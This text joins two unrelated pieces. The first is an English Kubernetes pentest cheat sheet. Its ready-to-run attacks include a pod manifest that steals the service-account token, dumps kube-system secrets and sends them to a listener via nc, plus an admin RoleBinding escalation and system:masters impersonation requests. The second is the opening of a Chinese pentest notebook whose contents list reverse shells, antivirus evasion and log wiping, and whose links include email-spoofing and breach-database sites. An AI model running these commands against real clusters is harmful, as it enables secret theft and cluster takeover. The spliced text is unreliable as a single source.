If the `kubectl` utility is installed in the container, it will use this service account automatically and will make interacting with the cluster much easier. If not, the contents of the `token` and `namespace` files can be used to make HTTP API requests directly.
### Environment Variables
The `KUBERNETES_SERVICE_HOST` and `KUBERNETES_SERVICE_PORT` environment variables are automatically provided to the container. They contain the IP address and port number of the Kubernetes master node. If `kubectl` is installed, it will use these values automatically. If not, the values can be used to determine the correct IP address to send API requests to.
```
KUBERNETES_SERVICE_HOST=192.168.154.228
KUBERNETES_SERVICE_PORT=443
```
Additionally, [environment variables](https://kubernetes.io/docs/concepts/services-networking/service/#discovering-services) are automatically created for each Kubernetes service running in the current namespace when the container was created. The environment variables are named using two patterns:
- A simplified `{SVCNAME}_SERVICE_HOST` and `{SVCNAME}_SERVICE_PORT` contain the IP address and default port number for the service.
- A [Docker links](https://docs.docker.com/network/links/#environment-variables) collection of variables named `{SVCNAME}_PORT_{NUM}_{PROTOCOL}_{PROTO|PORT|ADDR}` for each port the service exposes.
For example, all of the following environment variables would be available if a `redis-master` service were running with port 6379 exposed:
```
REDIS_MASTER_SERVICE_HOST=10.0.0.11
REDIS_MASTER_SERVICE_PORT=6379
REDIS_MASTER_PORT=tcp://10.0.0.11:6379
REDIS_MASTER_PORT_6379_TCP=tcp://10.0.0.11:6379
REDIS_MASTER_PORT_6379_TCP_PROTO=tcp
REDIS_MASTER_PORT_6379_TCP_PORT=6379
REDIS_MASTER_PORT_6379_TCP_ADDR=10.0.0.11
```
### Simulating `kubectl` API Requests
Most containers within a Kubernetes cluster won't have the `kubectl` utility installed. If running the [one-line `kubectl` installer](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) within the container isn't an option, you may need to craft Kubernetes HTTP API requests manually. This can be done by using `kubectl` *locally* to determine the correct API request to send from the container.
1. Run the desired command at the maximum verbosity level using `kubectl -v9 ...`
1. The output will include HTTP API endpoint URL, the request body, and an example curl command.
1. Replace the endpoint URL's hostname and port with the `KUBERNETES_SERVICE_HOST` and `KUBERNETES_SERVICE_PORT` values from the container's environment variables.
1. Replace the masked "Authorization: Bearer" token value with the contents of `/var/run/secrets/kubernetes.io/serviceaccount/token` from the container.
1. If the request had a body, ensure the "Content-Type: application/json" header is included and send the request body using the customary method (for curl, use the `--data` flag).
For example, this output was used to create the [Service Account Permissions](#service-account-permissions) request:
```powershell
# NOTE: only the Authorization and Content-Type headers are required. The rest can be omitted.
$ kubectl -v9 auth can-i --list
I1028 18:58:38.192352 76118 loader.go:359] Config loaded from file /home/example/.kube/config
I1028 18:58:38.193847 76118 request.go:942] Request Body: {"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","metadata":{"creationTimestamp":null},"spec":{"namespace":"default"},"status":{"resourceRules":null,"nonResourceRules":null,"incomplete":false}}
I1028 18:58:38.193912 76118 round_trippers.go:419] curl -k -v -XPOST -H "Accept: application/json, */*" -H "Content-Type: application/json" -H "User-Agent: kubectl/v1.14.10 (linux/amd64) kubernetes/f5757a1" 'https://1.2.3.4:5678/apis/authorization.k8s.io/v1/selfsubjectrulesreviews'
I1028 18:58:38.295722 76118 round_trippers.go:438] POST https://1.2.3.4:5678/apis/authorization.k8s.io/v1/selfsubjectrulesreviews 201 Created in 101 milliseconds
I1028 18:58:38.295760 76118 round_trippers.go:444] Response Headers:
...
```
## Information Gathering
### Service Account Permissions
The default service account may have been granted additional permissions that make cluster compromise or lateral movement easier.
The following can be used to determine the service account's permissions:
```powershell
# Namespace-level permissions using kubectl
kubectl auth can-i --list
# Cluster-level permissions using kubectl
kubectl auth can-i --list --namespace=kube-system
# Permissions list using curl
NAMESPACE=$(cat "/var/run/secrets/kubernetes.io/serviceaccount/namespace")
# For cluster-level, use NAMESPACE="kube-system" instead
MASTER_URL="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}"
TOKEN=$(cat "/var/run/secrets/kubernetes.io/serviceaccount/token")
curl "${MASTER_URL}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
--cacert "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt" \
--header "Authorization: Bearer ${TOKEN}" \
--header "Content-Type: application/json" \
--data '{"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","spec":{"namespace":"'${NAMESPACE}'"}}'
```
### Secrets, ConfigMaps, and Volumes
Kubernetes provides Secrets and ConfigMaps as a way to load configuration into containers at runtime. While they may not lead directly to whole cluster compromise, the information they contain can lead to individual service compromise or enable lateral movement within a cluster.
From a container perspective, Kubernetes Secrets and ConfigMaps are identical. Both can be loaded into environment variables or mounted as volumes. It's not possible to determine if an environment variable was loaded from a Secret/ConfigMap, so each environment variable will need to be manually inspected. When mounted as a volume, Secrets/ConfigMaps are always mounted as read-only tmpfs filesystems. You can quickly find these with `grep -F "tmpfs ro" /etc/mtab`.
True Kubernetes Volumes are typically used as shared storage or for persistent storage across restarts. These are typically mounted as ext4 filesystems and can be identified with `grep -wF "ext4" /etc/mtab`.
### Privileged Containers
Kubernetes supports a wide range of [security contexts](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) for container and pod execution. The most important of these is the "privileged" [security policy](https://kubernetes.io/docs/concepts/policy/pod-security-policy/) which makes the host node's devices available under the container's `/dev` directory. This means having access to the host's Docker socket file (allowing arbitrary container actions) in addition to the host's root disks (which can be used to escape the container entirely).
While there is no official way to check for privileged mode from *within* a container, checking if `/dev/kmsg` exists will usually suffice.
## RBAC Configuration
### Listing Secrets
An attacker that gains access to list secrets in the cluster can use the following curl commands to get all secrets in "kube-system" namespace.
```powershell
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
```
### Access Any Resource or Verb
```powershell
resources:
- '*'
verbs:
- '*'
```
### Pod Creation
Check your right with `kubectl get role system:controller:bootstrap-signer -n kube-system -o yaml`.
Then create a malicious pod.yaml file.
```yaml
apiVersion: v1
kind: Pod
metadata:
name: alpine
namespace: kube-system
spec:
containers:
- name: alpine
image: alpine
command: ["/bin/sh"]
args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000']
serviceAccountName: bootstrap-signer
automountServiceAccountToken: true
hostNetwork: true
```
Then `kubectl apply -f malicious-pod.yaml`
### Privilege to Use Pods/Exec
```powershell
kubectl exec -it <POD NAME> -n <PODS NAMESPACE> –- sh
```
### Privilege to Get/Patch Rolebindings
The purpose of this JSON file is to bind the admin "CluserRole" to the compromised service account.
Create a malicious RoleBinging.json file.
```powershell
{
"apiVersion": "rbac.authorization.k8s.io/v1",
"kind": "RoleBinding",
"metadata": {
"name": "malicious-rolebinding",
"namespcaes": "default"
},
"roleRef": {
"apiGroup": "*",
"kind": "ClusterRole",
"name": "admin"
},
"subjects": [
{
"kind": "ServiceAccount",
"name": "sa-comp"
"namespace": "default"
}
]
}
```
```powershell
curl -k -v -X POST -H "Authorization: Bearer <JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings -d @malicious-RoleBinging.json
curl -k -v -X POST -H "Authorization: Bearer <COMPROMISED JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secret
```
### Impersonating a Privileged Account
```powershell
curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
```
## Privileged Service Account Token
```powershell
$ cat /run/secrets/kubernetes.io/serviceaccount/token
$ curl -k -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
```
## Interesting endpoints to reach
```powershell
# List Pods
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/pods/
# List secrets
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
# List deployments
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/deployments
# List daemonsets
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/daemonsets
```
## API addresses that you should know
*(External network visibility)*
### cAdvisor
```powershell
curl -k https://<IP Address>:4194
```
### Insecure API server
```powershell
curl -k https://<IP Address>:8080
```
### Secure API Server
```powershell
curl -k https://<IP Address>:(8|6)443/swaggerapi
curl -k https://<IP Address>:(8|6)443/healthz
curl -k https://<IP Address>:(8|6)443/api/v1
```
### etcd API
```powershell
curl -k https://<IP address>:2379
curl -k https://<IP address>:2379/version
etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
```
### Kubelet API
```powershell
curl -k https://<IP address>:10250
curl -k https://<IP address>:10250/metrics
curl -k https://<IP address>:10250/pods
```
### kubelet (Read only)
```powershell
curl -k https://<IP Address>:10255
http://<external-IP>:10255/pods
```
## References
- [Kubernetes Pentest Methodology Part 1 - by Or Ida on August 8, 2019](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1)
- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2)
- [Kubernetes Pentest Methodology Part 3 - by Or Ida on November 21, 2019](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3)
- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0)
- [Kubernetes Pod Privilege Escalation](https://labs.bishopfox.com/tech-blog/bad-pods-kubernetes-pod-privilege-escalation)
|
# PentestNote
一份笔记,方便查阅
推 荐 使 用 **typora** 进行阅读
第一份笔记,弄的太乱,已经不想再继续更新了。
后面更多的是把知识点细化到单个仓库。感兴趣的朋友,可以看我的其他仓库。
2021.11.3
**Table of Contents**
- [PentestNote](#pentestnote)
- [请善用搜索[`Ctrl+F`]查找](#%E8%AF%B7%E5%96%84%E7%94%A8%E6%90%9C%E7%B4%A2ctrlf%E6%9F%A5%E6%89%BE)
- [前期信息收集](#%E5%89%8D%E6%9C%9F%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86)
- [工具推荐](#%E5%B7%A5%E5%85%B7%E6%8E%A8%E8%8D%90)
- [子域名](#%E5%AD%90%E5%9F%9F%E5%90%8D)
- [自动化信息收集](#%E8%87%AA%E5%8A%A8%E5%8C%96%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86)
- [目录扫描](#%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F)
- [扫描器](#%E6%89%AB%E6%8F%8F%E5%99%A8)
- [在线工具](#%E5%9C%A8%E7%BA%BF%E5%B7%A5%E5%85%B7)
- [指纹](#%E6%8C%87%E7%BA%B9)
- [网络空间搜索引擎](#%E7%BD%91%E7%BB%9C%E7%A9%BA%E9%97%B4%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E)
- [综合扫描](#%E7%BB%BC%E5%90%88%E6%89%AB%E6%8F%8F)
- [子域/旁站](#%E5%AD%90%E5%9F%9F%E6%97%81%E7%AB%99)
- [dns历史记录](#dns%E5%8E%86%E5%8F%B2%E8%AE%B0%E5%BD%95)
- [匿名](#%E5%8C%BF%E5%90%8D)
- [裤子](#%E8%A3%A4%E5%AD%90)
- [webshell查杀](#webshell%E6%9F%A5%E6%9D%80)
- [恶意软件分析](#%E6%81%B6%E6%84%8F%E8%BD%AF%E4%BB%B6%E5%88%86%E6%9E%90)
- [渗透测试](#%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95)
- [资产](#%E8%B5%84%E4%BA%A7)
- [实用](#%E5%AE%9E%E7%94%A8)
- [历史漏洞](#%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E)
- [目标站点源码获取技巧](#%E7%9B%AE%E6%A0%87%E7%AB%99%E7%82%B9%E6%BA%90%E7%A0%81%E8%8E%B7%E5%8F%96%E6%8A%80%E5%B7%A7)
- [google语法](#google%E8%AF%AD%E6%B3%95)
- [Github搜索](#github%E6%90%9C%E7%B4%A2)
- [关于社工](#%E5%85%B3%E4%BA%8E%E7%A4%BE%E5%B7%A5)
- [一点小技巧](#%E4%B8%80%E7%82%B9%E5%B0%8F%E6%8A%80%E5%B7%A7)
- [一些信息收集的命令](#%E4%B8%80%E4%BA%9B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E7%9A%84%E5%91%BD%E4%BB%A4)
- [互联网c段存活检测](#%E4%BA%92%E8%81%94%E7%BD%91c%E6%AE%B5%E5%AD%98%E6%B4%BB%E6%A3%80%E6%B5%8B)
- [apk敏感信息收集](#apk%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86)
- [mac下反编译apk](#mac%E4%B8%8B%E5%8F%8D%E7%BC%96%E8%AF%91apk)
- [spring相关程序必扫字典](#spring%E7%9B%B8%E5%85%B3%E7%A8%8B%E5%BA%8F%E5%BF%85%E6%89%AB%E5%AD%97%E5%85%B8)
- [漏洞攻击](#%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BB)
- [文件读取漏洞](#%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E)
- [文件包含漏洞](#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E)
- [sql注入漏洞](#sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E)
- [文件上传漏洞](#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E)
- [命令执行](#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C)
- [结果外带](#%E7%BB%93%E6%9E%9C%E5%A4%96%E5%B8%A6)
- [未授权漏洞](#%E6%9C%AA%E6%8E%88%E6%9D%83%E6%BC%8F%E6%B4%9E)
- [redis](#redis)
- [**常用命令**](#%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4)
- [**利用**](#%E5%88%A9%E7%94%A8)
- [写ssh-keygen登录](#%E5%86%99ssh-keygen%E7%99%BB%E5%BD%95)
- [写计划任务反弹shell](#%E5%86%99%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E5%8F%8D%E5%BC%B9shell)
- [写webshell](#%E5%86%99webshell)
- [利用主从复制获取shell](#%E5%88%A9%E7%94%A8%E4%B8%BB%E4%BB%8E%E5%A4%8D%E5%88%B6%E8%8E%B7%E5%8F%96shell)
- [其他姿势](#%E5%85%B6%E4%BB%96%E5%A7%BF%E5%8A%BF)
- [敏感信息泄漏利用](#%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E5%88%A9%E7%94%A8)
- [阿里云Access Key利用](#%E9%98%BF%E9%87%8C%E4%BA%91access-key%E5%88%A9%E7%94%A8)
- [alicloud利用工具](#alicloud%E5%88%A9%E7%94%A8%E5%B7%A5%E5%85%B7)
- [中间件安全](#%E4%B8%AD%E9%97%B4%E4%BB%B6%E5%AE%89%E5%85%A8)
- [tomcat安全](#tomcat%E5%AE%89%E5%85%A8)
- [数据库安全](#%E6%95%B0%E6%8D%AE%E5%BA%93%E5%AE%89%E5%85%A8)
- [mysql渗透总结](#mysql%E6%B8%97%E9%80%8F%E6%80%BB%E7%BB%93)
- [一、sqlshell获取](#%E4%B8%80sqlshell%E8%8E%B7%E5%8F%96)
- [二、mysql拿shell](#%E4%BA%8Cmysql%E6%8B%BFshell)
- [1、用命令直接导出shell](#1%E7%94%A8%E5%91%BD%E4%BB%A4%E7%9B%B4%E6%8E%A5%E5%AF%BC%E5%87%BAshell)
- [2、利用general_log拿shell](#2%E5%88%A9%E7%94%A8general_log%E6%8B%BFshell)
- [三、任意文件读取](#%E4%B8%89%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96)
- [四、mysql提权](#%E5%9B%9Bmysql%E6%8F%90%E6%9D%83)
- [五、拓展](#%E4%BA%94%E6%8B%93%E5%B1%95)
- [六、参考](#%E5%85%AD%E5%8F%82%E8%80%83)
- [mssql渗透总结](#mssql%E6%B8%97%E9%80%8F%E6%80%BB%E7%BB%93)
- [getshell](#getshell)
- [寻找绝对路径](#%E5%AF%BB%E6%89%BE%E7%BB%9D%E5%AF%B9%E8%B7%AF%E5%BE%84)
- [xp_cmdshell拿shell](#xp_cmdshell%E6%8B%BFshell)
- [差异备份拿shell](#%E5%B7%AE%E5%BC%82%E5%A4%87%E4%BB%BD%E6%8B%BFshell)
- [log备份拿shell](#log%E5%A4%87%E4%BB%BD%E6%8B%BFshell)
- [getsystem](#getsystem)
- [xp_cmdshell](#xp_cmdshell)
- [sp_oacreate](#sp_oacreate)
- [沙盒提权](#%E6%B2%99%E7%9B%92%E6%8F%90%E6%9D%83)
- [xp_regwrite](#xp_regwrite)
- [**工具使用**](#%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8)
- [sqlmap](#sqlmap)
- [**sqlmap详细命令参数**](#sqlmap%E8%AF%A6%E7%BB%86%E5%91%BD%E4%BB%A4%E5%8F%82%E6%95%B0)
- [sqlmap使用](#sqlmap%E4%BD%BF%E7%94%A8)
- [Tamper使用](#tamper%E4%BD%BF%E7%94%A8)
- [Aircrack-ng破解WIFI密码](#aircrack-ng%E7%A0%B4%E8%A7%A3wifi%E5%AF%86%E7%A0%81)
- [爆破攻击](#%E7%88%86%E7%A0%B4%E6%94%BB%E5%87%BB)
- [Hydra](#hydra)
- [Medusa](#medusa)
- [getshell方法](#getshell%E6%96%B9%E6%B3%95)
- [利用JavaScript转写php](#%E5%88%A9%E7%94%A8javascript%E8%BD%AC%E5%86%99php)
- [命令执行写shell](#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%86%99shell)
- [二次法](#%E4%BA%8C%E6%AC%A1%E6%B3%95)
- [鱼叉攻击](#%E9%B1%BC%E5%8F%89%E6%94%BB%E5%87%BB)
- [权限维持](#%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81)
- [提权检测脚本](#%E6%8F%90%E6%9D%83%E6%A3%80%E6%B5%8B%E8%84%9A%E6%9C%AC)
- [利用msf提权](#%E5%88%A9%E7%94%A8msf%E6%8F%90%E6%9D%83)
- [安卓锁屏破解](#%E5%AE%89%E5%8D%93%E9%94%81%E5%B1%8F%E7%A0%B4%E8%A7%A3)
- [交互shell获取](#%E4%BA%A4%E4%BA%92shell%E8%8E%B7%E5%8F%96)
- [无交互账号添加](#%E6%97%A0%E4%BA%A4%E4%BA%92%E8%B4%A6%E5%8F%B7%E6%B7%BB%E5%8A%A0)
- [Cobalt Strike笔记](#cobalt-strike%E7%AC%94%E8%AE%B0)
- [argue参数污染](#argue%E5%8F%82%E6%95%B0%E6%B1%A1%E6%9F%93)
- [bypass disable_function](#bypass-disable_function)
- [隧道工具](#%E9%9A%A7%E9%81%93%E5%B7%A5%E5%85%B7)
- [痕迹清理](#%E7%97%95%E8%BF%B9%E6%B8%85%E7%90%86)
- [windows清理](#windows%E6%B8%85%E7%90%86)
- [日志清除](#%E6%97%A5%E5%BF%97%E6%B8%85%E9%99%A4)
- [永久擦除技巧](#%E6%B0%B8%E4%B9%85%E6%93%A6%E9%99%A4%E6%8A%80%E5%B7%A7)
- [清除远程桌面连接记录](#%E6%B8%85%E9%99%A4%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E8%BF%9E%E6%8E%A5%E8%AE%B0%E5%BD%95)
- [利用Metasploit 痕迹清除](#%E5%88%A9%E7%94%A8metasploit-%E7%97%95%E8%BF%B9%E6%B8%85%E9%99%A4)
- [linux清理](#linux%E6%B8%85%E7%90%86)
- [日志清除](#%E6%97%A5%E5%BF%97%E6%B8%85%E9%99%A4-1)
- [永久擦除技巧](#%E6%B0%B8%E4%B9%85%E6%93%A6%E9%99%A4%E6%8A%80%E5%B7%A7-1)
- [清除history记录](#%E6%B8%85%E9%99%A4history%E8%AE%B0%E5%BD%95)
- [隐藏远程SSH登陆记录](#%E9%9A%90%E8%97%8F%E8%BF%9C%E7%A8%8Bssh%E7%99%BB%E9%99%86%E8%AE%B0%E5%BD%95)
- [横向移动](#%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8)
- [内网常用命令](#%E5%86%85%E7%BD%91%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4)
- [密码搜集](#%E5%AF%86%E7%A0%81%E6%90%9C%E9%9B%86)
- [文件查找](#%E6%96%87%E4%BB%B6%E6%9F%A5%E6%89%BE)
- [连通性](#%E8%BF%9E%E9%80%9A%E6%80%A7)
- [域信息收集](#%E5%9F%9F%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86)
- [常用信息收集](#%E5%B8%B8%E7%94%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86)
- [环境信息搜集](#%E7%8E%AF%E5%A2%83%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86)
- [内网渗透合集](#%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E5%90%88%E9%9B%86)
- [payload生成](#payload%E7%94%9F%E6%88%90)
- [payload下载&白名单bypass](#payload%E4%B8%8B%E8%BD%BD%E7%99%BD%E5%90%8D%E5%8D%95bypass)
- [python文件服务器](#python%E6%96%87%E4%BB%B6%E6%9C%8D%E5%8A%A1%E5%99%A8)
- [ftp](#ftp)
- [ODBCCONF利用dll](#odbcconf%E5%88%A9%E7%94%A8dll)
- [cmstp利用dll](#cmstp%E5%88%A9%E7%94%A8dll)
- [Rundll](#rundll)
- [Regsvr32](#regsvr32)
- [vbs](#vbs)
- [powershell](#powershell)
- [certutil](#certutil)
- [csc](#csc)
- [Desktopimgdownldr](#desktopimgdownldr)
- [CertReq](#certreq)
- [Unix-GTFOBins](#unix-gtfobins)
- [**whois**](#whois)
- [PIP](#pip)
- [Msiexec](#msiexec)
- [MSBuild](#msbuild)
- [Wmic](#wmic)
- [hta](#hta)
- [bitsadmin](#bitsadmin)
- [Installutil](#installutil)
- [Installutil&csc配合使用](#installutilcsc%E9%85%8D%E5%90%88%E4%BD%BF%E7%94%A8)
- [regasm和regsvcs](#regasm%E5%92%8Cregsvcs)
- [uuid](#uuid)
- [免杀](#%E5%85%8D%E6%9D%80)
- [payload分离免杀](#payload%E5%88%86%E7%A6%BB%E5%85%8D%E6%9D%80)
- [免杀loader(20210220)](#%E5%85%8D%E6%9D%80loader20210220)
- [shellcode loader](#shellcode-loader)
- [反弹shell](#%E5%8F%8D%E5%BC%B9shell)
- [监听](#%E7%9B%91%E5%90%AC)
- [bash](#bash)
- [perl](#perl)
- [python](#python)
- [php](#php)
- [ruby](#ruby)
- [nc](#nc)
- [java](#java)
- [lua](#lua)
- [powershell](#powershell-1)
- [OpenSsl加密隧道反弹](#openssl%E5%8A%A0%E5%AF%86%E9%9A%A7%E9%81%93%E5%8F%8D%E5%BC%B9)
- [linux命令笔记](#linux%E5%91%BD%E4%BB%A4%E7%AC%94%E8%AE%B0)
- [基础常用命令](#%E5%9F%BA%E7%A1%80%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4)
- [用户、权限-相关命令](#%E7%94%A8%E6%88%B7%E6%9D%83%E9%99%90-%E7%9B%B8%E5%85%B3%E5%91%BD%E4%BB%A4)
- [磁盘管理](#%E7%A3%81%E7%9B%98%E7%AE%A1%E7%90%86)
- [wget 下载文件](#wget-%E4%B8%8B%E8%BD%BD%E6%96%87%E4%BB%B6)
- [其他常用命令](#%E5%85%B6%E4%BB%96%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4)
- [AWK命令](#awk%E5%91%BD%E4%BB%A4)
- [shell编程](#shell%E7%BC%96%E7%A8%8B)
- [docker命令笔记](#docker%E5%91%BD%E4%BB%A4%E7%AC%94%E8%AE%B0)
- [ubuntu踩坑记录](#ubuntu%E8%B8%A9%E5%9D%91%E8%AE%B0%E5%BD%95)
- [git 笔记](#git-%E7%AC%94%E8%AE%B0)
- [当前项目(仓库)记住密码](#%E5%BD%93%E5%89%8D%E9%A1%B9%E7%9B%AE%E4%BB%93%E5%BA%93%E8%AE%B0%E4%BD%8F%E5%AF%86%E7%A0%81)
- [编程语言学习笔记](#%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0)
- [常用正则](#%E5%B8%B8%E7%94%A8%E6%AD%A3%E5%88%99)
- [php](#php-1)
- [读书笔记](#%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0)
- [漏洞笔记](
## 请善用搜索[`Ctrl+F`]查找
不定时更新,权当是记笔记了.
很多东西会先在公众号进行更新,有需要的先关注。
# 前期信息收集
## 工具推荐
### 子域名
- OneForAll https://github.com/shmilylty/OneForAll
- ksubdomain:https://github.com/knownsec/ksubdomain
- subDomainsBrute https://github.com/lijiejie/subDomainsBrute
### 自动化信息收集
- ARL https://github.com/TophantTechnology/ARL
-
### 目录扫描
win下面用御剑和7kbscan就够了,关键得看字典吧.我公众号之前有推荐过
- Safe6目录扫描 https://github.com/safe6Sec/dirScan
- dirsearch:https://github.com/maurosoria/dirsearch
- 7kbscan:https://github.com/7kbstorm/7kbscan-WebPathBrute
### 扫描器
- nessus扫主机
- awvs 扫web
- burp 不用说
- nmap 扫端口
- rustscan 超快的端口扫描,扫完自动调用nmap识别指纹(速度太快了有时候有些端口出不来) https://github.com/RustScan/RustScan
- xray 结合burp用来被动扫描 https://github.com/chaitin/xray
### 在线工具
#### 指纹
- https://www.godeye.vip/
- http://whatweb.bugscaner.com/look
- http://finger.tidesec.net/
- https://phonebook.cz/ 目标资产,如邮箱
#### 网络空间搜索引擎
- https://quake.360.cn/
- https://fofa.so/
- https://www.zoomeye.org/
- https://www.shodan.io/
#### 综合扫描
- https://scan.top15.cn/web/
- https://pentest-tools.com/information-gathering/google-hacking#
#### 子域/旁站
- https://phpinfo.me/old/domain
- https://webscan.cc/
- https://dnsdumpster.com/
- https://www.yougetsignal.com/tools/web-sites-on-web-server/
- https://www.robtex.com/
- https://www.dnsscan.cn/
#### dns历史记录
可用来找真实ip
- http://www.siteinfotool.com/
- http://toolbar.netcraft.com/site_report
- https://dnsdumpster.com/
- https://viewdns.info/iphistory/
- https://asm.ca.com/
#### 匿名
- Sms
https://www.materialtools.com/
http://receivefreesms.com/
- Email
https://10minutemail.net/
https://zh.mytrashmailer.com/
http://24mail.chacuo.net/enus
https://www.linshiyouxiang.net/
- Fake id
https://www.fakenamegenerator.com/
http://www.haoweichi.com/
https://www.fakeaddressgenerator.com/
- ip代理池
- 临时文件 https://bashupload.com/
- https://ppng.io/ 临时文件
- tor网络
- https://emkei.cz/ 邮件伪造
- 免费域名 https://www.freenom.com/zh/index.html?lang=zh
- dns http://xip.io/
- 云短信https://www.materialtools.com/
#### 裤子
- http://site3.sjk.space/
- https://ghostproject.fr/
-
#### webshell查杀
- D盾http://www.d99net.net/
- 河马https://www.webshell.pub/
- webdir++https://scanner.baidu.com/
#### 恶意软件分析
- https://www.virustotal.com/
- http://www.virscan.org/
- https://www.virscan.org/
- https://s.threatbook.cn/ 云沙箱
- https://habo.qq.com/
- https://ti.qianxin.com/
- https://sandbox.ti.qianxin.com/sandbox/page qax沙箱
- http://appscan.360.cn/ app扫描
- https://service.security.tencent.com/kingkong app
- https://www.appscan.io/ app
- https://www.ostorlab.co/ app 国外的
- https://app.any.run/ 最强沙箱
#### 渗透测试
- https://www.revshells.com/ 反弹shell
- https://i.hacking8.com/tiquan/ Windows提权辅助补丁查询
- https://pentest-tools.com/information-gathering/google-hacking# 谷歌hacking多种
#### 资产
- https://opendata.rapid7.com/
#### 实用
- 解析bash命令 https://explainshell.com/
- 终端录制 https://asciinema.org/
- 正则搜索 https://ihateregex.io/
## 历史漏洞
- https://cxsecurity.com/
- http://vulhub.org.cn/ (常用)
- http://cve.scap.org.cn/
- http://www.cnnvd.org.cn/
- https://vulmon.com/ (常用)
- https://sploitus.com (常用)
- https://vulners.com
- https://www.exploit-db.com/ (常用)
- https://www.seebug.org/
- https://packetstormsecurity.com/
- https://snyk.io/vuln (常用)
- https://www.cvedetails.com/
- https://www.cvebase.com/ (常用,cve分析和poc)
- 乌云镜像
- https://baizesec.github.io/bylibrary/ 白泽文库
- https://github.com/Mr-xn/Penetration_Testing_POC poc&exp各种工具
## 目标站点源码获取技巧
参考文章:https://www.anquanke.com/post/id/224420 如何利⽤Quake挖掘某授权⼚商边缘站点漏洞
如果站点删除对应特征的title关键词,可以根据favicon来搜索使用同套相似框架的站点。
当然假如quake没有给出这个站点的icon值,你也可以根据 `curl http://xxxx.com/favicon.ico|md5sum`的方式,得到站点ico的md5,然后利用quake语法,`favicon:"{MD5}"`搜索。
运气较好,在quake的第一页就发现了和厂商使用同样cms,并且明示用了什么框架的站点
**如何利用360quake搜索相似站点,并获得源码**
这里一般我们搜索相似源码的站点有以下几种方式:
- 1、`根据favicon搜索`
- 2、`根据首页页面里的一些特征,利用body:"{特征}"来搜索`
- 3、`根据response里的header头特征来搜索,一般是在cookie里有设置特定的cookie。比如shiro的rememberMe=xxx,或者apache的ofbiz。`
